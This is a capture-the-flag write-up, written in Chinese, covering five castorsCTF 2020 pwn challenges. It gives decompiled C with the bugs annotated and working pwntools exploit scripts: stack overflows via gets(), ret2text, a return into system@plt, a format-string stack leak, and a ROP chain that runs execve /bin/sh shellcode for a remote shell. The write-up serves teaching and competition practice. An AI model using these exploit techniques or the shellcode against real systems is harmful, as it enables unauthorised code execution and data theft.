【WriteUp】castorsCTF20 -- Pwn 题解

abcbof

Description:

nc chals20.cybercastors.com 14424

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

main 函数如下:

// Decompiler output for abcbof's main.
// v4 sits at rbp-0x110 and s2 at rbp-0x10, so s2 lies 0x100 bytes past the
// start of v4 inside the same frame (see the stack-offset annotations).
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-110h]
  char s2; // [rsp+100h] [rbp-10h]

  printf("Hello everyone, say your name: ", argv, envp);
  // gets() has no length bound: input longer than 0x100 bytes runs past v4
  // into s2. A bounded read (fgets with the buffer size) would prevent this.
  gets(&v4);
  // s2 is never initialised by the program itself; the only way it equals
  // the expected string is through the overflow above.
  if ( !strcmp("CyberCastors", &s2) )
    get_flag();
  puts("You lose!");
  return 0;
}

get_flag 函数如下:

// Prints flag.txt byte by byte to stdout and exits; never returns.
// Exits with status 1 if the file cannot be opened.
void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    // fgetc() returns int; narrowing to char means a 0xFF byte also compares
    // equal to -1 (with signed char) and would end the loop early. Harmless
    // for an ASCII flag, but the idiomatic form keeps an int until the EOF test.
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

覆盖变量漏洞

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# abcbof solve script (Python 2 / pwntools).
# Overwrites the neighbouring variable s2 via the unbounded gets() in main.
from pwn import *

# debug == 1 runs the local binary, anything else connects to the remote service.
debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14424)

# 0x100 bytes of filler cover the distance from v4 (rbp-0x110) to s2 (rbp-0x10)
# in the main listing above; the string that follows lands in s2 so that the
# strcmp succeeds. gets() stops at newline, not NUL, so NUL filler is fine.
pd = '\x00' * 0x100
pd += 'CyberCastors'
p.sendlineafter('name: ', pd)
p.interactive()

Flag:

castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}

babybof1

Description:

nc chals20.cybercastors.com 14425

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments

main 函数如下:

// Decompiler output for babybof1's main.
// The only local is a buffer at rbp-0x100; with no canary (see checksec)
// nothing separates it from the saved rbp and return address.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-100h]

  puts("Welcome to the cybercastors Babybof");
  printf("Say your name: ", argv);
  // Unbounded gets(): the classic stack overflow. The fix is a length-limited
  // read such as fgets(v4, sizeof(buf), stdin).
  return gets(&v4);
}

get_flag 函数如下:

// Prints flag.txt to stdout and exits; never returns (exit(1) if the file
// cannot be opened). Identical to the abcbof helper above.
void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    // fgetc() result is narrowed to char before the EOF test; a 0xFF byte in
    // the file would therefore be indistinguishable from EOF (signed char).
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

ret2text 没啥说的

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# babybof1 solve script (Python 2 / pwntools): ret2text into get_flag.
from pwn import *

# debug == 1 runs the local binary, anything else connects to the remote service.
debug = 1
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
# No PIE (checksec above), so the symbol address from the ELF is the runtime address.
addr_get_flag = elf.sym['get_flag']

# 0x100 bytes fill the buffer (rbp-0x100 in the listing) and 8 more cover the
# saved rbp; the next qword is the return address, replaced by get_flag.
pd = '\x00' * 0x108
pd += p64(addr_get_flag)
p.sendlineafter('name: ', pd)
p.interactive()

Flag:

castorsCTF{th4t's_c00l_but_c4n_y0u_g3t_4_sh3ll_n0w?}

babybof2

Description:

nc chals20.cybercastors.com 14434

Solution:

程序保护如下:

Arch:     i386-32-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

main 函数如下:

// Decompiler output for babybof2's main. All input handling is in start();
// winnersLevel() is never called from here.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  puts("Do you really think you can get to the winners table?");
  puts("I'll give you one shot at it, what floor is the table at: ");
  start();
  puts("Yeah that's what I thougt, LOL.\n");
  return 0;
}

start 函数如下:

// Reads one line into a 0x48-byte stack buffer with no bound (i386 frame,
// ebp-0x48). The return value is gets()'s result, i.e. the buffer pointer.
char *start()
{
  char s; // [esp+0h] [ebp-48h]

  return gets(&s);
}

winnersLevel 函数如下:

// Prints the flag via system("cat ./flag.txt") when a1 is 386 or 258.
// Returns 1 on success, 0 otherwise. Never reached by main; its value for
// the solve is that it pulls system@plt into the binary.
signed int __cdecl winnersLevel(int a1)
{
  signed int result; // eax

  if ( a1 != 386 && a1 != 258 )
  {
    puts("You guessed right but it seems your badge number isn't on our list.");
    result = 0;
  }
  else
  {
    puts("Wow! Please excuse me sir I had no idea...here are your chips");
    system("cat ./flag.txt");
    result = 1;
  }
  return result;
}

解题思路:

直接 plt_system 加参数读取 flag 就完事

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# babybof2 solve script (Python 2 / pwntools): return into system@plt with
# the "cat ./flag.txt" string that winnersLevel already contains.
from pwn import *

# debug == 1 runs the local binary, anything else connects to the remote service.
debug = 1
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14434)
elf = ELF('./chall', checksec=False)
plt_system = elf.plt['system']
# Address of the "cat ./flag.txt" literal in the binary (hard-coded from the
# disassembly; valid because the binary is not PIE).
addr_flag = 0x0804A046

# gdb.attach(p, "b *0x08049228\nc")
# 0x48 bytes fill the buffer in start() (ebp-0x48) and 4 more cover saved ebp.
# i386 cdecl layout: return address, then a fake return address for system
# (0 here), then system's first argument.
pd = 'a' * 0x4c
pd += p32(plt_system)
pd += p32(0)
pd += p32(addr_flag)
p.sendline(pd)
p.interactive()

Flag:

castorsCTF{b0F_s_4r3_V3rry_fuN_4m_l_r1ght}

babyfmt

Description:

nc chals20.cybercastors.com 14426

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

main 函数如下:

// Decompiler output for babyfmt's main. The flag is read into the stack
// buffer v5 (rbp-0x210), then the user's line is passed to printf as the
// format string itself.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *stream; // [rsp+8h] [rbp-218h]
  char v5; // [rsp+10h] [rbp-210h]
  char s; // [rsp+110h] [rbp-110h]
  unsigned __int64 v7; // [rsp+218h] [rbp-8h]

  v7 = __readfsqword(0x28u);   // stack canary (checksec: Canary found)
  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  __isoc99_fscanf(stream, "%s", &v5);
  fclose(stream);
  printf("Hello everyone, this is babyfmt! say something: ");
  fgets(&s, 255, _bss_start);   // _bss_start is the decompiler's name for stdin here
  // Format-string bug: user input is the format, so %N$lx reads stack words
  // including v5. The fix is printf("%s", s) or fputs(s, stdout).
  printf(&s, 255LL);
  return 0;
}

解题思路:

不知道为啥远程的输出还带着 \r,所以本地和远程的脚本不完全一样

这题拿 %lx 泄露字符串就行

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# babyfmt solve script (Python 2 / pwntools): leak stack words with
# positional %N$lx and decode them back into the flag string.
from pwn import *
import binascii

# debug == 1 runs the local binary, anything else connects to the remote service.
debug = 2
# NOTE(review): the binary is amd64 per the checksec above; arch='i386' is
# harmless here since no packing/asm helper is used, but it does not match.
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14426)

# One "%<i>$lx.tmp" per stack slot; ".tmp" is a delimiter for parsing the
# output. Positions 8..15 presumably cover the flag buffer v5 in main.
pd = ''
for i in range(8, 0x10):
    pd += '%' + str(i) + '$lx.tmp'
p.sendline(pd)
# The remote echo ends the line with \r\n (hence the remark in the write-up).
p.recvuntil('tmp\r\n')
res = []
for i in range(0, 8):
    # Each leak is a hex qword: pad to 16 digits, unhexlify, then reverse the
    # bytes because the stack holds them little-endian.
    res.append(binascii.unhexlify(p.recvuntil('.tmp')[:-4].rjust(0x10, '0'))[::-1])
print ''.join(res)
p.interactive()

Flag:

castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}

babybof1 pt2

Description:

nc chals20.cybercastors.com 14425

Solution:

程序保护如下:

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x400000)
RWX:      Has RWX segments

main 函数如下:

// Decompiler output for babybof1's main (same binary as babybof1, pt2 asks
// for a shell). One 0x100-byte stack buffer, no canary, unbounded gets().
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-100h]

  puts("Welcome to the cybercastors Babybof");
  printf("Say your name: ", argv);
  // Unbounded read; a length-limited fgets() would close the overflow.
  return gets(&v4);
}

get_flag 函数如下:

// Prints flag.txt and exits; never returns. Same helper as in babybof1;
// not used by this part of the challenge.
void __noreturn get_flag()
{
  char v0; // [rsp+7h] [rbp-9h]
  FILE *stream; // [rsp+8h] [rbp-8h]

  stream = fopen("flag.txt", "r");
  if ( !stream )
    exit(1);
  while ( 1 )
  {
    // int result of fgetc() narrowed to char before the EOF compare.
    v0 = fgetc(stream);
    if ( v0 == -1 )
      break;
    putchar(v0);
  }
  fclose(stream);
  exit(0);
}

解题思路:

前面那个 flag 说你要尝试拿到 shell,那这道题的 get_flag 函数就没啥用了

ret2libc 好像一开始可以,后来主办方貌似禁掉了,改用 ret2shellcode 也可以

exp 如下:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# babybof1 pt2 solve script (Python 2 / pwntools): ret2shellcode.
# Works only because NX is disabled and the binary has RWX segments
# (checksec above); with NX on, .bss would not be executable.
from pwn import *

# debug == 1 runs the local binary, anything else connects to the remote service.
debug = 2
context(arch='amd64', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14425)
elf = ELF('./chall', checksec=False)
plt_gets = elf.plt['gets']
addr_bss = elf.bss()
# First "pop rdi; ret" gadget in the binary (Python 2 generator .next()).
addr_rop1 = elf.search(asm("pop rdi;ret")).next()


# 0x100 bytes fill the buffer, 8 cover saved rbp, then the chain:
#   pop rdi; ret  ->  rdi = addr_bss
#   gets@plt      ->  reads the second input line into .bss
#   addr_bss      ->  "return" into the bytes just written
pd = '\x00' * 0x108
pd += p64(addr_rop1)
pd += p64(addr_bss)
pd += p64(plt_gets)
pd += p64(addr_bss)
# gdb.attach(p, "b *0x40078B\nc")
p.sendlineafter('Babybof\r\n', pd)

# Second input: the raw shellcode that gets() stores in .bss (contains the
# "//bin/sh" bytes). It must not contain \n, since gets() stops there.
pd = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.sendline(pd)
p.interactive()

Flag:

castorsCTF{w0w_U_jU5t_h4ck3d_th15!!1_c4ll_th3_c0p5!11}